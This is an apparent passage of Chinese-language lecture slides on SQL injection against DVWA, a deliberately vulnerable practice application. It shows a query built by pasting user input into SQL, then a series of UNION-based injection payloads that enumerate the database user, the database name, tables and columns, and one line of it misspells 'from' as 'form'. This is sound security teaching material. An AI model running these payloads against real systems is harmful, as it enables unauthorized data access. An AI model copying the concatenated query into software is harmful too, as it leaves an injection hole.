8. SQL 重組
$getid = "SELECT first_name, last_name FROM users WHERE user_id =
'$id'";
檢測是否有錯誤
1' and 1=1#
組合後變成
"select first_name,last_name form users where user_id = '1' and 1=1#";
9. 5.SQL Injection
1' order by 1#
1' union all select 1,2#
1' union all select user(),database()#
1' union all select null,table_name from information_schema.tables#
1' union all select null,table_name from information_schema.tables where
table_schema = 'dvwa'#
1' union all select null,column_name from information_schema.columns where
table_schema ='dvwa'#